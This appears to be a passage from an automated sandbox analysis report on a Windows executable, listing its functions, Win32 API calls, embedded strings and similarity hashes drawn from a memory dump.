Instruction ID: 71c3439dcf91f74b3c703b0f06d79ebc176fe4d199c41bb353e07eeb5dc8e2bb
Opcode Fuzzy Hash: 16cd23462d6f4ee28b73bb2feef0babf42e31c8966b102dead7b85d20f4ff640
Instruction Fuzzy Hash: 8821A174A00208BBDF01AB65CC95EFEBBB8EF49300F100115BD51972E1EB75991D9B30

Function 00D59645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00D59651
GetClassNameW.USER32(00000000,?,00000100), ref: 00D59666
_wcscmp.LIBCMT ref: 00D59678
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00D596F3

Strings

SHELLDLL_DefView, xrefs: 00D59672
details, xrefs: 00D596A1
list, xrefs: 00D596D5
smallicons, xrefs: 00D596BB
largeicons, xrefs: 00D59687

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: ae2aab825f49570a6839674dbdc59ff6c5bdc60db2cb3708705e5ba4bf016543
Instruction ID: 4997202065b5ec9fc75cf08bdd523ad9515148339c41c8d5004fb42c0ce0f85b
Opcode Fuzzy Hash: ae2aab825f49570a6839674dbdc59ff6c5bdc60db2cb3708705e5ba4bf016543
Instruction Fuzzy Hash: 54112776288353FAFE152620EC27DE6F79CCB15325B200026FE00A10D1FE71991C4A78

Function 00D78BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00D78BEC
CoInitialize.OLE32(00000000), ref: 00D78C19
CoUninitialize.OLE32 ref: 00D78C23
GetRunningObjectTable.OLE32(00000000,?), ref: 00D78D23
SetErrorMode.KERNEL32(00000001,00000029), ref: 00D78E50
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00D92C0C), ref: 00D78E84
CoGetObject.OLE32(?,00000000,00D92C0C,?), ref: 00D78EA7
SetErrorMode.KERNEL32(00000000), ref: 00D78EBA
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00D78F3A
VariantClear.OLEAUT32(?), ref: 00D78F4A

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: c4e07ef2b3874ced95e71e7ccf9d400da0249739c10704871a80b96674ad59c9
Instruction ID: b323f8fa3e36204f8e4bbce9d7461f2431b8ff7fad0939cd03285d77fbd63b91
Opcode Fuzzy Hash: c4e07ef2b3874ced95e71e7ccf9d400da0249739c10704871a80b96674ad59c9
Instruction Fuzzy Hash: BDC115B1604305AFD700DF64C88892AB7E9FF88748F14895DF989DB251EB71ED05CB62

Function 00D64189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00D6419D
__swprintf.LIBCMT ref: 00D641AA

Part of subcall function 00D238D8: __woutput_l.LIBCMT ref: 00D23931

FindResourceW.KERNEL32(?,?,0000000E), ref: 00D641D4
LoadResource.KERNEL32(?,00000000), ref: 00D641E0
LockResource.KERNEL32(00000000), ref: 00D641ED
FindResourceW.KERNEL32(?,?,00000003), ref: 00D6420D
LoadResource.KERNEL32(?,00000000), ref: 00D6421F
SizeofResource.KERNEL32(?,00000000), ref: 00D6422E
LockResource.KERNEL32(?), ref: 00D6423A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00D6429B

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: dfb82b91818d429a65025c151d1943c5a78a4160c7faf216370427a47a28e4e2
Instruction ID: 8db4a90e0d00fa2ef7d9c6b95e34cfb94ecf1fc83f35c20d18f4135c139908ec
Opcode Fuzzy Hash: dfb82b91818d429a65025c151d1943c5a78a4160c7faf216370427a47a28e4e2
Instruction Fuzzy Hash: 4831BCB1A0131AAFCB019FA0EC58EBF7BACEF08701F144525F801D6250E734DA618BB8

Function 00D616DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00D61700
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00D60778,?,00000001), ref: 00D61714
GetWindowThreadProcessId.USER32(00000000), ref: 00D6171B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00D60778,?,00000001), ref: 00D6172A
GetWindowThreadProcessId.USER32(?,00000000), ref: 00D6173C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00D60778,?,00000001), ref: 00D61755
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00D60778,?,00000001), ref: 00D61767
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00D60778,?,00000001), ref: 00D617AC
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00D60778,?,00000001), ref: 00D617C1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00D60778,?,00000001), ref: 00D617CC

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: fb422686cb22cbbc1918a79ce99dc8abcc776853393a5c0ef854ece1db0ec3e9
Instruction ID: 2bf17a86a285171da66e78cd64bb299287af04c39393c8d587f4ade4a386c7b9
Opcode Fuzzy Hash: fb422686cb22cbbc1918a79ce99dc8abcc776853393a5c0ef854ece1db0ec3e9
Instruction Fuzzy Hash: 2B31897961430AFFEB219F25EC89F697BA9AF55711F184029F804C63A0EBB49D408F70

Function 00D0FBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00D0FC06
OleUninitialize.OLE32(?,00000000), ref: 00D0FCA5
UnregisterHotKey.USER32(?), ref: 00D0FDFC
DestroyWindow.USER32(?), ref: 00D44A00
FreeLibrary.KERNEL32(?), ref: 00D44A65
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D44A92

Strings

close all, xrefs: 00D0FC01

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 05321b3f5b374e22eb977ce7a4835167f18570196dec4501a92ce9c618e27bc4
Instruction ID: 73d115aad9ae72f12dd86fdbb0de4049089686e605c7577eb6ab3c9ed6d30b0f
Opcode Fuzzy Hash: 05321b3f5b374e22eb977ce7a4835167f18570196dec4501a92ce9c618e27bc4
Instruction Fuzzy Hash: 62A16C307012129FDB29EF14D495B69F764EF04704F2842ADE80AAB2A2DB30ED56CF74

Function 00D5A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00D5AA64), ref: 00D5A9A2

Strings

CLASSNN, xrefs: 00D5A744
REGEXPCLASS, xrefs: 00D5A767
INSTANCE, xrefs: 00D5A8B0
TEXT, xrefs: 00D5A8D9
NAME, xrefs: 00D5A7D4
CLASS, xrefs: 00D5A721

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: aa36adabf8b098e66ce2d9cd0529100469bdb2956b2e330d947d6a4ad4913c2f
Instruction ID: 63155113e197c32af33eaa8ae4c1a9c06f3bd9f4be799fceffe70ba7129da996
Opcode Fuzzy Hash: aa36adabf8b098e66ce2d9cd0529100469bdb2956b2e330d947d6a4ad4913c2f
Instruction Fuzzy Hash: E8917230A00666EADF08DF64C481BE9FB64FF14305F548219DD9AA7291DB30AA5DCFB1

Function 00D02E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00D02EAE

Part of subcall function 00D01DB3: GetClientRect.USER32(?,?), ref: 00D01DDC
Part of subcall function 00D01DB3: GetWindowRect.USER32(?,?), ref: 00D01E1D
Part of subcall function 00D01DB3: ScreenToClient.USER32(?,?), ref: 00D01E45

GetDC.USER32 ref: 00D3CF82
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00D3CF95
SelectObject.GDI32(00000000,00000000), ref: 00D3CFA3
SelectObject.GDI32(00000000,00000000), ref: 00D3CFB8
ReleaseDC.USER32(?,00000000), ref: 00D3CFC0
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00D3D04B

Strings

U, xrefs: 00D3CF20

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 23de051980f2724d56dc978b5278c19576209802003e1c47adfb154261fa7aea
Instruction ID: 1a49f138a69a25a394ea74f9b735e9ed798f3c7f3b0769057053a24cadf4c743
Opcode Fuzzy Hash: 23de051980f2724d56dc978b5278c19576209802003e1c47adfb154261fa7aea
Instruction Fuzzy Hash: 7471BE31501205DFCF258F64C885ABA7BB6FF49360F18426AFD95AA2A6C731C841DF70

Function 00D8C27C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D02612: GetWindowLongW.USER32(?,000000EB), ref: 00D02623

Part of subcall function 00D02344: GetCursorPos.USER32(?), ref: 00D02357
Part of subcall function 00D02344: ScreenToClient.USER32(00DC67B0,?), ref: 00D02374
Part of subcall function 00D02344: GetAsyncKeyState.USER32(00000001), ref: 00D02399
Part of subcall function 00D02344: GetAsyncKeyState.USER32(00000002), ref: 00D023A7

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00D8C2E4
ImageList_EndDrag.COMCTL32 ref: 00D8C2EA
ReleaseCapture.USER32 ref: 00D8C2F0
SetWindowTextW.USER32(?,00000000), ref: 00D8C39A
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00D8C3AD
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00D8C48F

Strings

@GUI_DROPID, xrefs: 00D8C3E1
@GUI_DRAGFILE, xrefs: 00D8C424

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 94a99bc224567ec02c6a9e83b4b2400c5fa971128345155928e26af57934ce90
Instruction ID: cb312cb2a5af00d6b94428ce7c19465da71bdcdb96ddeadcc18a9673ecd735cd
Opcode Fuzzy Hash: 94a99bc224567ec02c6a9e83b4b2400c5fa971128345155928e26af57934ce90
Instruction Fuzzy Hash: 79515970204306AFDB00EF24C856F6A7BE5EF88314F04492DF5958B2E1DB71A958DB72

Function 00D78F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00D8F910), ref: 00D7903D
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00D8F910), ref: 00D79071
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00D791EB
SysFreeString.OLEAUT32(?), ref: 00D79215

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 265e4aeb1c05b6241d6352504a01a735ac965b5d92dbef561be36d28ac480194
Instruction ID: 1bed72b44f2cfa5264ba993374de172635b5cd667a9202f394e96ba751484712
Opcode Fuzzy Hash: 265e4aeb1c05b6241d6352504a01a735ac965b5d92dbef561be36d28ac480194
Instruction Fuzzy Hash: BAF12E72A00209EFDF04DF94C898EAEB7B9FF49315F148059F919AB291DB31AD45CB60

Function 00D7F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D7F9C9
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00D7FB5C
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00D7FB80
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00D7FBC0
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00D7FBE2
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00D7FD5E
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00D7FD90
CloseHandle.KERNEL32(?), ref: 00D7FDBF
CloseHandle.KERNEL32(?), ref: 00D7FE36

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 695d635220b7ea6952dd61857838934815965c0ba3e911c16674adb4e6a755d9
Instruction ID: 04094a9116547e5ea1f4f6906196e15c2c0d6277aadb7592da616981189e5282
Opcode Fuzzy Hash: 695d635220b7ea6952dd61857838934815965c0ba3e911c16674adb4e6a755d9
Instruction Fuzzy Hash: 78E180312043419FCB25EF24D491B6ABBE1EF84354F18896DF8999B2A2DB71DC44CB72

Function 00D64F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D648AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00D638D3,?), ref: 00D648C7

Part of subcall function 00D648AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00D638D3,?), ref: 00D648E0

Part of subcall function 00D64CD3: GetFileAttributesW.KERNEL32(?,00D63947), ref: 00D64CD4

lstrcmpiW.KERNEL32(?,?), ref: 00D64FE2
_wcscmp.LIBCMT ref: 00D64FFC
MoveFileW.KERNEL32(?,?), ref: 00D65017

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 8b242d4985be0a754d072e42413596f9ac383624e43e63001f8c2ec7a84de1f3
Instruction ID: e1971bf804a2ea8a743b1dbb28a7c25074444c40aa2e94a7702a580f96d17d1b
Opcode Fuzzy Hash: 8b242d4985be0a754d072e42413596f9ac383624e43e63001f8c2ec7a84de1f3
Instruction Fuzzy Hash: 595162B24087859BC724DB60D8819DFB3ECEF95301F04092EB589D7191EF74E6888776

Function 00D888B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00D8896E

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 8d095df3110bb7afd8f2bea8a6b3605650ea198fa15dc8de61ebf147dc4d7c41
Instruction ID: c5693bad0f6bb1b161676e3ded876b2df1432c20525872c3f57c258822569040
Opcode Fuzzy Hash: 8d095df3110bb7afd8f2bea8a6b3605650ea198fa15dc8de61ebf147dc4d7c41
Instruction Fuzzy Hash: 91517130600209BBEB24BF28DC89BA97B65FB05310FA44216F555E76E1DF71E980AB71

Function 00D02B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00D3C547
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00D3C569
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00D3C581
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00D3C59F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00D3C5C0
DestroyIcon.USER32(00000000), ref: 00D3C5CF
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00D3C5EC
DestroyIcon.USER32(?), ref: 00D3C5FB

Part of subcall function 00D8A71E: DeleteObject.GDI32(00000000), ref: 00D8A757

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: f2fc405aa8c686aef6fd2642ed74731ee951314711126f346750d3f44f65c3bd
Instruction ID: 4491b0a2c6ec98d82409cba5b98c3d6956a865938a12748e8d5b268405cb3a1d
Opcode Fuzzy Hash: f2fc405aa8c686aef6fd2642ed74731ee951314711126f346750d3f44f65c3bd
Instruction Fuzzy Hash: 62513570A11209AFDB24DF24CC49FAA7BB5EB58350F144529F946E72E0DB70E990DB70

Function 00D59B50 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D5AE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D5AE77
Part of subcall function 00D5AE57: GetCurrentThreadId.KERNEL32 ref: 00D5AE7E
Part of subcall function 00D5AE57: AttachThreadInput.USER32(00000000,?,00D59B65,?,00000001), ref: 00D5AE85

MapVirtualKeyW.USER32(00000025,00000000), ref: 00D59B70
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00D59B8D
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00D59B90
MapVirtualKeyW.USER32(00000025,00000000), ref: 00D59B99
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00D59BB7
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00D59BBA
MapVirtualKeyW.USER32(00000025,00000000), ref: 00D59BC3
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00D59BDA
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00D59BDD

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 4b996292b61e413cf78af8acca3888935dea600ff4c6aa9a8bfa1f2027b05fe7
Instruction ID: f6c705b8195982e38a5988656d288db4c0e24ce29599701357f26b12dcdb4595
Opcode Fuzzy Hash: 4b996292b61e413cf78af8acca3888935dea600ff4c6aa9a8bfa1f2027b05fe7
Instruction Fuzzy Hash: 3011C2B1660318BEFA106B64DC8AF6A7A1DDB4C751F100525FA44EB1A0C9F25C10DBB4

Function 00D58E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00D58A84,00000B00,?,?), ref: 00D58E0C
HeapAlloc.KERNEL32(00000000,?,00D58A84,00000B00,?,?), ref: 00D58E13
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00D58A84,00000B00,?,?), ref: 00D58E28
GetCurrentProcess.KERNEL32(?,00000000,?,00D58A84,00000B00,?,?), ref: 00D58E30
DuplicateHandle.KERNEL32(00000000,?,00D58A84,00000B00,?,?), ref: 00D58E33
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00D58A84,00000B00,?,?), ref: 00D58E43
GetCurrentProcess.KERNEL32(00D58A84,00000000,?,00D58A84,00000B00,?,?), ref: 00D58E4B
DuplicateHandle.KERNEL32(00000000,?,00D58A84,00000B00,?,?), ref: 00D58E4E
CreateThread.KERNEL32(00000000,00000000,00D58E74,00000000,00000000,00000000), ref: 00D58E68

Memory Dump Source

